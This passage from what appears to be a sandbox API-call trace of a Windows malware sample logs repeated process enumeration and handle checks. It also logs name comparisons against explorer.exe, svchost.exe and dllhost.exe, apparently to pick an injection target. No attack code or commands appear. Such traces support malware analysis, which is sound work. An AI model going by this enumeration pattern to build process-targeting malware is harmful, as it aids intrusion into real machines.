Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.673] CloseHandle (hObject=0xd8) returned 1 [0199.673] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0199.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0199.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.674] CloseHandle (hObject=0xd8) returned 1 [0199.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0199.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0199.674] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.674] CloseHandle (hObject=0xd8) returned 1 [0199.674] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0199.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0199.675] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.675] CloseHandle (hObject=0xd8) returned 1 [0199.675] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0199.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0199.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.676] CloseHandle (hObject=0xd8) returned 1 [0199.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0199.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0199.676] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.676] CloseHandle (hObject=0xd8) returned 1 [0199.676] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0199.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0199.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.677] CloseHandle (hObject=0xd8) returned 1 [0199.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0199.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0199.677] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.677] CloseHandle (hObject=0xd8) returned 1 [0199.677] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0199.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0199.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.678] CloseHandle (hObject=0xd8) returned 1 [0199.678] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0199.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0199.678] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.678] CloseHandle (hObject=0xd8) returned 1 [0199.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0199.679] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0199.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0199.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0199.680] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0199.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0199.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0199.681] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0199.682] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0199.682] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.682] CloseHandle (hObject=0xd8) returned 1 [0199.682] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0199.682] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0199.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0199.683] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.683] CloseHandle (hObject=0xd8) returned 1 [0199.683] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0199.683] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0199.683] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0199.683] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0199.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0199.683] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0199.684] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.684] CloseHandle (hObject=0xd8) returned 1 [0199.684] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0199.685] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.685] CloseHandle (hObject=0xd8) returned 1 [0199.685] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0199.685] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.685] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0199.685] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.685] CloseHandle (hObject=0xd8) returned 1 [0199.685] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.720] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0199.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0199.720] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0199.721] CloseHandle (hObject=0xd8) returned 1 [0199.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0199.721] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0199.722] CloseHandle (hObject=0xd4) returned 1 [0199.722] Sleep (dwMilliseconds=0x3e8) [0200.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0200.752] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0200.753] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0200.753] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0200.754] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0200.754] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0200.755] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0200.755] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0200.756] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0200.756] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0200.757] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0200.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0200.757] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0200.758] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0200.758] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0200.759] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0200.759] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0200.760] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0200.760] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0200.761] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0200.761] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0200.762] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.762] CloseHandle (hObject=0xd8) returned 1 [0200.762] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0200.762] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0200.762] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0200.762] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0200.762] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0200.763] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.763] CloseHandle (hObject=0xd8) returned 1 [0200.763] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0200.763] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0200.763] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0200.763] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0200.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0200.764] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0200.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0200.765] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.765] CloseHandle (hObject=0xd8) returned 1 [0200.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0200.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0200.765] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.765] CloseHandle (hObject=0xd8) returned 1 [0200.765] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0200.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0200.766] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.766] CloseHandle (hObject=0xd8) returned 1 [0200.766] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0200.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0200.767] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.767] CloseHandle (hObject=0xd8) returned 1 [0200.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0200.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0200.767] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0200.767] CloseHandle (hObject=0xd8) returned 1 [0200.767] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, 